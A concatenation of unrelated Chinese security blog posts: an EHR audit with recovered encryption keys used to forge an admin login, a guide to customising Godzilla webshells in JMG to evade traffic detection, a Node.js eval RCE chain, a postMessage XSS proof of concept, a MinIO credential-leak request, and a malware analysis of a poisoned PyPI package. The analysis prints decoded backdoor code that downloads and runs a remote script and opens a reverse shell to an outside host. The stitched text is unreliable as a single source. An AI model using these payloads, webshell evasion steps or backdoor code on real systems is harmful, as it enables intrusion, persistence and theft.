水一个演练遇到的某个EHR系统的审计过程，首先获得系统的所有路由信息

批量跑接口，分出来鉴权接口和未鉴权接口

后面看代码，发现参数都加密了，然后找到有个加密的方法，后面截图的代码默认都被我还原过了

如下

def Kayang(s):
    # 初始化字符数组
    cArr = [''] * len(s)
    length = len(s) - 1
    i = length
    i2 = length
    # 初始化 c 值
    c = ((2 ^ 5) << 4) ^ (2 ^ 5)
    
    while i >= 0:
        c2 = i2
        c3 = (c2 ^ c) & 0x3F  # 0x3F 是 '?' 的 ASCII 值
        cArr[c2] = chr(ord(s[i2]) ^ c)
        i3 = i2 - 1
        if i3 < 0:
            break
        c = (i3 ^ c3) & 0x3F
        cArr[i3] = chr(ord(s[i3]) ^ c3)
        i2 = i3 - 1
        i = i2
    
    # 将字符数组转换为字符串
    return ''.join(cArr)


input_str = "~EyXQ_\"
output_str = Kayang(input_str)
print("Input:", input_str)
print("Output:", output_str)

0x01 审计过程

任意文件读取

除去springMvc的路由，再看一下web.xml，看看有没有直接定义路径的路由，看到了个资源文件的，进去看看

然后这里很明显有个path参数有问题

一个../的慢慢加上去，获得任意跨目录读文件漏洞，虽然实际作用不大，不过这说明其他洞存在概率高。。

任意用户登录

在未鉴权接口中一眼没看到什么大概率直接getshell的，所以去看包含sso字样的接口，在LoginxSSOController类中实现了LoginSSO路由

onload当前类中没有，再去当前类继承的BaseAction类去看看

找到了onLoad方法，然后再跳到onPageLoad方法，这个父类中也没实现代码

又回到LoginxSSOController类看到了onPageLoad的实现代码，发现1个关键参数account，有个解密操作，然后到达autoLogin方法，可知当前url为/LoginxSSO.json?account=密文，最终传入到autoLogin(url,account,false)

找到加密过程，直接调用或者ai帮你还原个python调用

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
from Crypto.Random import get_random_bytes
import binascii

class EncryptAndDecodeUtil:
    # 静态变量
    Kayang = bytes([
        106, 105, 194, 29, 184, 80, 227, 145, 124, 35, 34, 166, 60, 126, 106, 195,
        193, 187, 69, 21, 59, 62, 24, 208, 173, 142, 21, 118, 103, 95, 77, 198
    ])
    B = bytes([
        202, 18, 194, 223, 133, 237, 32, 62, 249, 153, 18, 24, 67, 30, 191, 234
    ])

    @staticmethod
    def encode(content: str) -> str:
        if not content:
            return ""
        # 使用 AES 加密
        cipher = AES.new(EncryptAndDecodeUtil.Kayang, AES.MODE_CBC, EncryptAndDecodeUtil.B)
        padded_data = pad(content.encode('utf-8'), AES.block_size)
        encrypted_data = cipher.encrypt(padded_data)
        return binascii.hexlify(encrypted_data).decode('utf-8')

    @staticmethod
    def decode(content: str) -> str:
        if not content:
            return ""
        try:
            # 使用 AES 解密
            cipher = AES.new(EncryptAndDecodeUtil.Kayang, AES.MODE_CBC, EncryptAndDecodeUtil.B)
            encrypted_data = binascii.unhexlify(content)
            decrypted_data = cipher.decrypt(encrypted_data)
            unpadded_data = unpad(decrypted_data, AES.block_size)
            return unpadded_data.decode('utf-8')
        except Exception as e:
            try:
                # 如果 AES 解密失败，尝试 DES 解密
                return EncryptAndDecodeUtil.decodeDES(binascii.unhexlify(content), "T_E^UYYO\u0007")
            except Exception:
                # 如果 DES 解密失败，尝试使用默认密钥
                return EncryptAndDecodeUtil.decodeDES(binascii.unhexlify(content), "kayangv9")

    @staticmethod
    def decodeDES(data: bytes, key: str) -> str:
        try:
            # 使用 DES 解密
            from Crypto.Cipher import DES
            key_bytes = key.encode('utf-8')
            cipher = DES.new(key_bytes, DES.MODE_ECB)
            decrypted_data = cipher.decrypt(data)
            return decrypted_data.decode('utf-8').rstrip('\0')
        except Exception as e:
            print(f"Error in decodeDES: {e}")
            return ""

    @staticmethod
    def encodeDES(content: str, key: str) -> str:
        if not content:
            return ""
        try:
            # 使用 DES 加密
            from Crypto.Cipher import DES
            key_bytes = key.encode('utf-8')
            cipher = DES.new(key_bytes, DES.MODE_ECB)
            padded_data = pad(content.encode('utf-8'), DES.block_size)
            encrypted_data = cipher.encrypt(padded_data)
            return binascii.hexlify(encrypted_data).decode('utf-8')
        except Exception as e:
            print(f"Error in encodeDES: {e}")
            return ""


# 测试代码
if __name__ == "__main__":
    # 测试 encode 和 decode
    encod_text = "ttt"
    encoded_text = EncryptAndDecodeUtil.encode(encod_text)
    print(f"Encoded: {encoded_text}")
    decode_text = "fa32fda300eeb85fc0e3116ec9a0f191"
    decoded_text = EncryptAndDecodeUtil.decode(decode_text)
    print(f"Decoded: {decoded_text}")

    # 测试 encodeDES 和 decodeDES
    original_text = "Hello, DES!"
    encoded_text = EncryptAndDecodeUtil.encodeDES(original_text, "kayangv9")
    print(f"Encoded DES: {encoded_text}")
    decoded_text = EncryptAndDecodeUtil.decodeDES(binascii.unhexlify(encoded_text), "kayangv9")
    print(f"Decoded DES: {decoded_text}")

随便加密个ttt获得结果2972707ed0733287402a099e76285e7a

请求后提示账号不存在，有点东西哈

生成admin账号的，fa32fda300eeb85fc0e3116ec9a0f191，发现跳302

找个其他鉴权接口，测试下cookie，发现有效，这很好，后缀aspx可以忽略哈，随便选的后缀，是web.xml设置的走spingmvc认证的几个后缀之一，可能是为了让别人误判后端语言吧

没过鉴权是回显这个的

任意文件上传

找到这个洞的大概过程，在burp的api访问记录中从上到下看了一些路径可能包含上传功能的api，但没有找到能用的，一些原因如下

1.写死了后缀

2.还有的是检测时黑名单，但使用其他后缀名单会导致函数不返回true，导致函数不往下走

3.有一些会在调用文件上传前存在一些前置操作，导致方法停止运行

后续开始全局搜索fileOutputStream.write，去看看对应的文件，没找到

又搜FileUtils.copyFile( ，找到一个saveAs方法

通过对saveAs方法的调用，定位到了本次的接口，代码如下，刚好在检测后缀前他调用了内置上传方法，追溯上去发现后缀正好是传入的srcname参数控制，这样虽然无法完全运行完毕，但还是完成了上传步骤

同时缓存文件的uuid还会在异常信息中返回

完成闭环

0x02 结束

水文结束，不知道什么时候才能再次碰到资产用上洞

​ 因为哥斯拉默认版本触发流量设备告警的几率较高，所以大部分场景都是使用二开过的哥斯拉及shell进行管理webshell，不过在一些java内存马注入的漏洞上面使用jmg生成内存马时还是会需要先使用默认版本哥斯拉shell再注入二开版本的哥斯拉shell，增加告警风险，所以得把自己的shell加到jmg里直接生成。

0x02 添加JMG生成shell选项

1.jmg-gui模块

添加Filter_Image按钮

添加结果输出

2.jmg-core模块

添加Shell类型，起名SHELL_FILTER_IMAGE

添加生成逻辑

添加生成逻辑

3.jmg-godzilla

添加指向shell类的代码

新建个内存马类，类名和前面加的对应上，转换你用来bypass流量设备的jsp代码为Filter类型的java代码，我这里肯定是哥斯拉类型的shell咯，加密方法和解密方法照搬，其他也都是照搬过来，需要注意的是我这里当属性为null时，setAttribute属性的代码用原本的即可

0x03 添加完成

最终效果，帮助你内存马场景下防止使用普通哥斯拉shell触发流量检测设备的告警

​ 之前举行过的云资产的演练又开始了，目前拥有目标某设备的老版本前台RCE漏洞，但本次因某些原因不允许使用此漏洞，所以入口点需要重新找，准备找个新洞，记录nodejs审计过程如下

0x02 审计

1.前期过程

​ 首先我的想法是寻找那种简单的命令注入漏洞，因为之前的洞就蛮简单的，我做了如下操作，目的是定位调用了命令执行函数的路由文件

grep -rl "child_process" --include=\*.js .

​ 然后首先看的是ping功能，很简单的定义路由，接参，然后传入命令执行函数中，但发现存在正则过滤，由于正则我都是现记现忘，重新看了下，写死了\d限制了其他字符，所以漏洞不存在

​ 接着过了一遍筛选出来的所有存在命令注入函数的路由，没发现能用的，有的看着代码是存在漏洞但是当用在目标网站上是不存在漏洞的，推测是目标更新了版本进行修复漏洞（这里还没有去跟踪各个函数调用链深挖）

​ 随即又搜了下nodejs的文章知道了还可以寻找代码执行漏洞，也就是eval函数，eval参数可控时直接进行导入命令执行进行调用就行

http://localhost:3000/?abc=require('child_process').execSync('open -a Calculator.app', { encoding: 'utf8' })

​ grep大法之故技重施，实际就有2个route文件存在eval，当然别的文件也是耗费精力看了但没东西，就不讲了，后续在反推eval函数代码执行的调用链中同时找到一个命令注入漏洞

grep -rl "eval" --include=\*.js .

2.代码执行

​ 然后就是发现的漏洞从eval函数反推调用链路及传参的伤脑细胞过程，调用链中较为重要的函数调用过程如下，函数里嵌套的其他一些函数就不写了

  +-----------------------------------------------------------------+
  | router.post('/generatorRuleMap', function (req, res)             |
  +-----------------------------------------------------------------+
                              |
                              V
  +-----------------------------------------------------------------+
  | execGetNostructureNodeAndLinks(NodeSet, startTime, ... , cb)     |
  +-----------------------------------------------------------------+
                              |
                              V
  +-----------------------------------------------------------------+
  | getRelationNodeandLinks(resultSet, relationMap, ... , cb)        |
  +-----------------------------------------------------------------+
                              |
                              V
  +-----------------------------------------------------------------+
  | getNodevalueBynodeType(row, nodeType, regex, index, cb)          |
  +-----------------------------------------------------------------+
                              |
                              V
  +-----------------------------------------------------------------+
  | getRegexPattern(srcMessage, pattern, index)                      |
  +-----------------------------------------------------------------+

2.1 getRegexPattern()

​ 此为最终调用eval的函数，没有限制，直接将接收的参数传入eval函数，payload参数名为pattern

2.2 getNodevalueBynodeType()

​ 此函数为当nodeType!=1时进入目标函数，payload参数名为regex

2.3 getRelationNodeandLinks()

​ 此函数需要使relationMap!=1进入目标函数，payload参数名为relationMap.srcRegex，是键的值

2.4 execGetNostructureNodeAndLinks()

​ 此函数需要满足3个条件进入目标函数，payload参数名为relationShips => relation

• outPutFieldsArray.length > 1
• 存在/usr/local/las/program/neo4j/structure.csv文件
• fileSize != 0

2.5 router.post

​ 此函数需要满足5个条件才能进入目标函数

• 能够根据_id查出结果docs
• docrelation == 0
• 服务器为linux
• indexArray.length > 0
• 获得相应的splitrelationsBystructure()函数返回

payload参数名依次变化如下，并且可知我们控制的参数是用来控制查询的id，而不是直接传入exp，所以还需要找到id对应的值是插入到数据库的过程

      req.body._id   //获得请求参数
           ↓
          s_id     //对请求参数进行了过滤，防止出现sql注入
           ↓
   docs.relationships   //查询结果的键
           ↓
       relations   //查询结果的键
           ↓
resultRelation.noStructure   //经splitrelationsBystructure函数处理后返回的键
           ↓
  noStructureRelations   //经splitrelationsBystructure函数处理后返回的键

2.5.1 splitrelationsBystructure()

​ payload参数为relationShips，若要将payload最终保存到noStructure键中，需满足以下条件

• srcNodeType != 1 or dstNodeType != 1

​ 并且通过这里的键调用，联动前面的payload传递过程，也得知了最终传入eval的参数为srcRegex，如果在下面这个函数中调用，就是relation.srcRegex，和srcNodeType这些是同级的，所以srcRegex和srcNodeType这些都是插入id对应的内容中的键名

2.5.2 通过前端定位添加关系规则功能

​ 由于需要找到如何控制id查询结果，所以在网站上找到代码中对应的前端功能位置，此功能是生成关系规则图，然后在前端找到了对应的添加关系规则的功能，由于没保存具体图片，口述记录一下过程

​ 然后在尝试新增关系模型时，发现提交对应的参数输入框被注释了，当时梳理的还没有那么清晰还是什么其他原因导致没在http中改包，是使用burp将返回<!--注释符号注释和其他的一些返回包修改，让新增关系模型的功能重新在前端显示

​ 获取到添加关系模型的路由和数据包后，定位到代码，确定无误，参数名都能对上，最后构造能够满足以上需要步入的目标函数的所有条件的参数值

2.6 漏洞利用

最终利用过程分为四步

1.添加关系规则

2.查询关系规则，获得ID

3.调用ID，触发payload

4.删除关系规则，否则会在数据库中留下很多数据

5.目标不出网通过写入文件执行命令结果进行命令回显

3.命令执行

3.1 generateToCsv()

​ 命令执行是在找代码执行跟踪调用链时发现的，这个函数就是在代码执行调用链那个execGetNostructureNodeAndLinks函数中调用的

​ 传入到这里的参数跟踪后会发现是和代码执行中传入的payload是差不多的，通过审计发现只是传入的参数名改为了srcLogfield，利用过程就不写了，就是添加关系时payload改下参数

0x03 总结

​ 整体就是类似于sql的二次注入的代码执行&命令注入漏洞，先保存payload到数据库，在后面调用数据库数据时触发恶意代码。

​ 看文章说nodejs的代码还可以尝试找原型链污染进行RCE，以后有需要再学，最后吐槽下公司给我们调薪了，高兴吧？是往下调！入职几年，年收入比入职时还低了，还低了，抵了，了...🤡

​ 实际审计过程还有其他一些东西，大概如下

• 拿到权限发现是低权限用户，通过其他发现可利用漏洞直接变成root权限
• 请求必须携带对应目标host的Referer
• 记不清了。。

​ 在Java编程语言中，interface和implements两个关键字都跟面向对象编程的概念有密切的关系。下面是对它们的基础解释：

interface：在Java中，接口（interface）是一种引用类型，跟类（class）是同级的结构。它是一种完全抽象的类型，用于定义对象之间的约定或行为规范。接口中可以定义抽象方法和常量，但不能包含普通方法（除非是Java 8之后引入的default方法和静态方法）。实质上，接口是对动作的抽象。

implements：这是一个关键字，用于类来"实现"一个或多个接口。当一个类实现了一个接口，就意味着这个类必须提供接口中所有抽象方法的具体实现。一个类可以实现多个接口，这就提供了一种对于Java单继承的补充机制。

以下是一个简单的接口和类的示例：

interface Animal {
    void eat();
    void sleep();
}

class Dog implements Animal {
    @Override
    public void eat() {
        System.out.println("The dog eats.");
    }
    
    @Override
    public void sleep() {
        System.out.println("The dog sleeps.");
    }
  
  	public void bark() {
        System.out.println("The dog barks.");
    }
}

​ 在这个例子中，我们定义了一个名为Animal的接口，接口有两个方法：eat和sleep。然后，我们创建了一个类Dog，这个类通过使用关键字implements来实现了Animal接口。这就意味着Dog类必须提供Animal接口中所有方法的实现。

请注意，虽然Dog类必须实现所有的Animal接口的方法，但这并不意味着Dog类不能有Animal接口之外的其他方法。例如，Dog类可能还有其他方法，如 bark()：

在这个例子中，你能够在Dog对象上调用bark()方法：

Dog myDog = new Dog();
myDog.bark();  // The dog barks.

但你不能在Animal对象上调用bark()方法，因为它不是Animal接口的一部分：

Animal myAnimal = new Dog();  // This is allowed because Dog is a subtype of Animal.
myAnimal.bark();  // This is NOT allowed.

在上述例子中，尽管myAnimal是一个Dog的实例，但是由于其类型被声明为Animal，我们只能调用在Animal接口中定义的方法。如果你需要调用bark()方法，就需要将对象类型转换成Dog:

Animal myAnimal = new Dog();  // This is allowed because Dog is a subtype of Animal.
((Dog)myAnimal).bark();  // This would be allowed because we are casting myAnimal to Dog.

总体而言，使用interface和implements的关键目的是创建一个可以由多种类按照共享的规则进行实现的架构，这样通过使用多态性，就可以使我们的代码更加灵活和可扩展。

0x02 审计相关

那么实际在审计中这个基础知识又扮演着什么角色，这里用某个OA的漏洞触发点跟踪过程进行举例。

1. 当你找到此漏洞路径关联的调用方法，onMessage()

   

2. 然后你每次都利用idea进行command+鼠标左键进行跟踪，直到追溯到handleMessage()方法，发现，咦，怎么是空的

   

3. 这个时候如果你知道interface&implements的关系，那么你就会去找实现WorkspaceMessageHandler这个接口的类了，也知道为啥要搜implements WorkspaceMessageHandler了（快捷跳转见文尾）。

   

4. 最终你成功找到了漏洞触发方法，而不是半路夭折。

PS: idea右键转到接口实现代码，快捷键option+command+B

​ 发现有人写了帆软的GUI放在github，试用后觉得很方便，遂下载后尝试将新的利用链添加进去，以方便后续自己测试用，但是将利用链的jar包依赖添加进去后，打包出来的jar包太大了，有200多mb，所以想缩减下

0x02

​ 有人说一个一个看依赖然后去做适配，觉得不太现实，最后使用方法如下

1. 修改依赖fine-third-10.0.jar为fine-third-10.0.zip

2. 使用MacZip(mac的压缩工具，其他压缩工具不可以)

   

3. 然后选中不需要的依赖去移除，实际删除一些没用到的大体积的文件夹就可以了

   

0x03

一开始记得以前弄过，就是改压缩包去缩减体积，具体记不清了。

• 靠模糊印象去尝试，先试解压后去删除没用的依赖在压缩，但是这样出来的jar包不能用，idea看着总是多一层路径
• 后来是解压删除依赖后，选择所有文件夹后右键压缩，不过这样的jar包虽然不多一层路径了，但也不能用

最终效果

简单实用，200多mb => 40mb，顺便标题改成自己的ID，哈哈哈，感谢yecp181的源码

1.新建VPN

2.选择LNS类型，输入一些输入项，然后新建一个用户，记住这里设置的对端隧道名称，客户端连接时要用到

3.输入地址设置，这里的IP地址自由设置，只要不和此防火墙设备的IP在同一网段即可

4.安装HUAWEI SecoClient客户端进行连接

我是Mac，找了下资源，win的和mac的安装包都存在百度云了

链接: https://pan.baidu.com/s/1lb1RczQuvVWeP5Pr1TwuFQ 提取码: sven

5.输入设置的信息，LNS服务器地址就是防火墙IP地址，PAP模式，如果设置了隧道密码就启用隧道验证功能，这里我设置了，所以开启，隧道名称填刚才新建隧道的对端隧道名称，如果不对应是连不上的

6.使用设置的用户密码进行登录，连接成功，这时连接后当前电脑也就无法上网了

7.经测试，修改连接配置为允许连接后联网，并设置好内网IP段(在防火墙路由表或其他配置中可看到相关内网网段)，这样就可以通内网资产了，不这样设置我这里会导致ping任意网段都是通的（实际使用时，需自行测试是否需要此步骤）

RELEASE.2019-12-17T23-16-33Z <= version < MinIO RELEASE.2023-03-20T20-16-18Z

minio环境

version: '3.7'

# starts 4 docker containers running minio server instances. Each
# minio server's web interface will be accessible on the host at port
# 9001 through 9004.
services:
  minio1:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio1
    volumes:
      - data1-1:/data1
      - data1-2:/data2
    ports:
      - "9001:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

  minio2:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio2
    volumes:
      - data2-1:/data1
      - data2-2:/data2
    ports:
      - "9002:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

  minio3:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio3
    volumes:
      - data3-1:/data1
      - data3-2:/data2
    ports:
      - "9003:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

  minio4:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio4
    volumes:
      - data4-1:/data1
      - data4-2:/data2
    ports:
      - "9004:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

## By default this config uses default local driver,
## For custom volumes replace with volume driver configuration.
volumes:
  data1-1:
  data1-2:
  data2-1:
  data2-2:
  data3-1:
  data3-2:
  data4-1:
  data4-2:

启动环境

docker-compose -f docker-compose.yml up

获取凭据

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.0.113:9001
Content-Length: 0
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://127.0.0.1:9001/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

PS：包含本次其他漏洞的联合利用还有待研究

postMessage API 是在 HTML5 中引入的通信方法，可以在标签中实现跨域通信。

简单来说就是两个网页窗口进行通信的方法。

0x02 如何工作

• A页面: 一个带有 接收postMessages通信的测试html网页 ==> 相等于一个正常网站页面

<!-- 假如这是一个正常系统的.html -->
<head><meta charset="UTF-8"></head>
 
<div id="receiveMessage">
Hello World!
</div>
 
<script>
var test = "flag{123456}";
window.onload = function() {
    window.addEventListener('message', function (e) {  // 监听 message 事件
        // alert(e.origin);
        document.getElementById('receiveMessage').innerHTML = "从"+ e.origin +"收到消息： " + e.data;
    });
}
</script>

• B页面: 一个带有 使用postMessages发送通信的测试html网页 ==> 相等于一个攻击页面

<!-- POC.html -->
<title>Postmessage PoC</title>
<script>
  function pocFrame(win) {
    let msg = "hello world!";
 
    win.postMessage(msg, '*');
  }
</script>
<iframe src="http://127.0.0.1:9000/listen.html" onload="pocFrame(this.contentWindow)"></iframe>

正常的运行流程

A页面持续监听通信，当访问B页面的时候运行js代码，向A页面发送通信，A页面接受信息然后对接受内容进行处理

应用场景: 一个网站实时监听，另一个网页某项运行流程结束后发送进度通知到监听的网页，后续如何xxx...

0x03 如何变成漏洞

• 携带payload的poc.html

<!-- POC.html -->
<title>Postmessage PoC</title>
<script>
  function pocFrame(win) {
    let msg = "hello world! <img src=x onerror=alert(test)>";
 
    win.postMessage(msg, '*');
  }
</script>
<iframe src="http://127.0.0.1:9000/listen.html" onload="pocFrame(this.contentWindow)"></iframe>

产生漏洞原因

• 消息接收方没有对发送方的身份进行验证，导致可以自定义发送方网页

  • 例如: if (e.origin !== "https://www.freebuf.com")

• 消息接收方对发送方发送的内容进行了展示处理，从而可以使用XSS payload进行截断

  • 例如: document.getElementById('receiveMessage').innerHTML = "从"+ e.origin +"收到消息： " + e.data;

利用过程

和反射型xss类似，用户在访问目标网站的时候，打开了攻击者提供的url，url是携带xss payload的poc.html，导致在目标网站执行了js代码。

其他形式漏洞

上面展示的是接收方没有对发送身份验证，在对接收的消息进行处理后被xss payload截断导致存在xss漏洞

• 接收方是正常系统 => 发送方是恶意html

那么这样就还会有另外一种形式的漏洞，发送方没有设置接收方的身份，例如 xxx.postMessage(msg,'*');

*号代表对接收方的窗口没有限制，只要你设置了监听(addEventListener)都可以接收到，那么如果正常系统在发送的时候就是如此设置，而刚好发送内容是一些敏感的信息，如账号密码的hash，那么你通过设置了监听当做接收方的恶意html，用户浏览正常系统时，然后在打开你的html后你就可以获得其正常网站的发送内容

• 发送方是正常系统 => 接收方是恶意html

0x04 挖掘方法

通过postMessage方法的关键字进行定位功能点，通过debug代码寻找触发点，从而获得漏洞，可以使用burp的插件J2EEScan辅助寻找使用相应功能的js文件，如何扩展延伸的进行挖掘对于我来说是一个有待开发的过程，目前我本人对此漏洞的经验并不足以帮我找到更好的自动化挖掘办法ing，

"阳康"后在github闲逛时发现同事star了一个后处理免杀项目，看描述说可以绕过任何类型的防病毒产品，自然我也对项目产生了一些兴趣，遂开始查看项目代码并由此开启了本次的投毒项目分析。

PS：此前并未在其他渠道发现本次分析项目的预警

0x02 分析过程

2.1 项目地址

文章编写时项目还在正常运行，我将其保存在了快照网站，若后面项目删除方便继续查看

https://github.com/machine1337/pycrypt
https://web.archive.org/web/20230103031922/https://github.com/machine1337/pycrypt

2.2 发现异常

项目的介绍较长且附带视频，整体并无异常，在查看代码准备了解实现原理时发现异常，其导入了一个异常的依赖库colourema，有一些PY代码编写基础的朋友应该知道修改终端颜色的依赖库叫做colorama，那么很明显这里可能存在一些问题

2.3 定位后门

在pypi的依赖库介绍中，colourema的介绍有3000+star,实际链接却为colorama，到此确定此依赖库存在后门。

通过对依赖库代码进行查看，因担心使用vscode存在一些风险，使用sublime打开，最后于initialise.py文件中发现后门代码

2.4 后门代码

2.4.1 一层加密

加密代码

解密后代码

import os,platform,subprocess
if platform.system().startswith("Linux"):
        try:
            with open('/tmp/file.py', 'w') as f:
                f.write("import os \nimport subprocess \nfrom pathlib import Path \nfrom urllib import request \nhello = os.getlogin() \nPATH = '/home/' + hello + '/.msfdb/update'\nPAT  = '/tmp/file.py'\nisExist = os.path.exists(PATH) \nif not isExist:\n        os.makedirs(PATH) \nif Path(PATH).is_file(): \n           print("") \nelse: \n")
                f.write("     remote_url ='https://dl.dropboxusercontent.com/s/bpf0cfzf2h576o3/mozila.sh'\n     local_file = PATH+'/.path.sh' \n     request.urlretrieve(remote_url, local_file) \n     subprocess.call(\"bash /home/$USER/.msfdb/update/.path.sh >/dev/null 2>&1\", shell=True) \n")
                f.write("     if Path(PAT).is_file(): \n         try:\n           os.remove(PAT)\n         except:\n           print()")
        except FileNotFoundError:
            print("")
        subprocess.call("python3 /tmp/file.py &", shell=True)

2.4.2 二层加密

上面代码下载并运行了此链接的sh文件，同样保存在了web.archive.org中，后续的相关文件也是如此，方便后续其他感兴趣的师傅复查

#sh文件中继续中转发现一层加密
https://dl.dropboxusercontent.com/s/bpf0cfzf2h576o3/mozila.sh
#加密代码链接
https://dl.dropboxusercontent.com/s/n7xl8ki0k9xqt7x/update.py

加密代码

解密后代码

fpyepsdb = chr(105)
zbieto = chr(109) + chr(112) + chr(111) + chr(114) + chr(116) + chr(32) + chr(98) + chr(97)
ontxmpdwi = chr(115) + chr(101) + chr(54) + chr(52) + chr(59) + chr(101) + chr(120) + chr(101)
rdnpqwkiz = chr(99) + chr(40) + chr(39) + chr(39) + chr(46) + chr(106) + chr(111) + chr(105)
qvjlktvg = chr(110) + chr(40) + chr(91) + chr(121) + chr(91) + chr(48) + chr(93) + chr(32)
nqsokf = chr(102) + chr(111) + chr(114) + chr(32) + chr(120) + chr(32) + chr(105) + chr(110)
...
同样是很长的一段加密字符串
...
qytpmsygab = ""
qytpmsygab += fpyepsdb
qytpmsygab+= zbieto + ontxmpdwi
...
同样是很长的一段加密字符串
...
qytpmsygab+= xpcexvz + yslqs
exec(qytpmsygab)

2.4.3 三层加密

加密代码

上一步解密后代码中的那段很长的加密字符串

解密后代码

import base64;
exec(''.join([y[0] for x in [x for x in base64.b64decode( ('同样是很长的一段加密字符串').encode('ascii') ).decode('ascii')] for y in [[x[0], x[1]] for x in {'\t': '6', '\n': 'R', ' ': 'U', '!': 'Y', '@': 'i', '~': 'n', '`': 'Q', '#': '7', '$': 'A', '%': 'E', '^': '$', '&': 'o', '*': 'm', '(': '!', ')': '/', '_': '~', '=': 'L', '-': 'h', '+': ')', '{': 'N', '}': 'O', '|': '\\', '\\': 'g', '[': 'S', ']': '+', ':': 'z', ';': '|', '"': 's', "'": '`', ',': '{', '.': 'F', '/': ']', '?': '2', '>': 'y', '<': 'l', '0': '%', '1': 'W', '2': 'H', '3': 'c', '4': '\n', '5': 'x', '6': 'Z', '7': '.', '8': '>', '9': 'K', 'a': '<', 'b': 'V', 'c': '(', 'd': 'B', 'e': ';', 'f': 'u', 'g': "'", 'h': 'p', 'i': 'w', 'j': '3', 'k': '}', 'l': '1', 'm': 't', 'n': 'k', 'o': '9', 'p': '?', 'q': 'M', 'u': 'q', 'r': 'a', 's': '0', 't': '\t', 'v': 'J', 'w': '=', 'x': 'T', 'y': '_', 'z': 'G', 'A': '[', 'B': '&', 'C': '4', 'D': '-', 'E': '@', 'F': 'e', 'G': '^', 'H': 'f', 'I': '8', 'J': '*', 'K': 'D', 'L': '#', 'M': 'C', 'N': ' ', 'O': 'b', 'P': 'P', 'Q': 'X', 'U': ',', 'R': '"', 'S': 'd', 'T': 'j', 'V': 'I', 'W': 'v', 'X': '5', 'Y': ':', 'Z': 'r'}.items()] if x == y[1]]))

2.4.4 四层加密

加密代码

上一步解密后代码中的那段很长的加密字符串

解密后代码

from cryptography.fernet import Fernet

encrypted_message = '同样是很长的一段加密字符串'
key = b'fFdnVFFLuGqYOndl9Xvp9pRnOenZ__grZS5sFssfiX4='

f = Fernet(key)
decrypted_message = f.decrypt(encrypted_message.encode())
exec(decrypted_message.decode())

2.4.5 五层加密

加密代码

上一步解密后代码中的那段很长的加密字符串

解密后代码

import codecs
exec(codecs.decode(b'同样是很长的一段加密字符串', "hex").decode())

2.4.6 六层加密

加密代码

上一步解密后代码中的那段很长的加密字符串

解密后代码

import gzip

code = b"同样是很长的一段加密字符串".decode()
exec(gzip.decompress(code.encode('cp437')).decode())

2.4.7 七层加密

加密代码

解密后代码

import socket
import json
import subprocess
import time
import os
import sys
def reliable_send(data):
    jsondata = json.dumps(data)
    s.send(jsondata.encode())
def reliable_recv():
    data = ''
    while True:
        try:
            data = data + s.recv(1024).decode().rstrip()
            return json.loads(data)
        except ValueError:
            continue
def download_file(file_name):
    f = open(file_name, 'wb')
    s.settimeout(2)
    chunk = s.recv(1024)
    while chunk:
        f.write(chunk)
        try:
            chunk = s.recv(1024)
        except socket.timeout as e:
            break
    s.settimeout(None)
    f.close()
def upload_file(file_name):
    f = open(file_name, 'rb')
    s.send(f.read())
def shell():
    while True:
        command = reliable_recv()
        if command == 'quit':
            break
        elif command == 'background':  # BEGIN
            pass
        elif command == 'help':  # ideally to be removed
            pass
        elif command == 'clear':
            pass  # END
        elif command[:3] == 'cd ':
            os.chdir(command[3:])
        elif command[:6] == 'upload':
            download_file(command[7:])
        elif command[:8] == 'download':
            upload_file(command[9:])
        elif command[:7] == 'sendall':
            subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                             stdin=subprocess.PIPE)
        else:
            execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                       stdin=subprocess.PIPE)
            result = execute.stdout.read() + execute.stderr.read()
            result = result.decode()
            reliable_send(result)
def connection():
    while True:
        time.sleep(5)
        try:
            s.connect(('blazywound.ignorelist.com', 5008))
            shell()
            s.close()
            break
        except:
            connection()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection()

2.5 项目作者

通过对投毒项目的宿主进行查看，发现此用户自称为漏洞赏金猎人和渗透测试人员的一名大学生，自我介绍包装的几乎完美，且拥有近300名的关注者，共发布35个原创红队相关项目。

https://github.com/machine1337?tab=repositories&q=&type=source&language=&sort=

经过调查，所有Python项目都是相同手法，通过PYPI依赖库进行部署后门，早期项目还有使用sh文件的手法，最早的后门项目存在于2021.9.24，并于2022.11月到12月账号恢复活跃。

0x03 分析结果

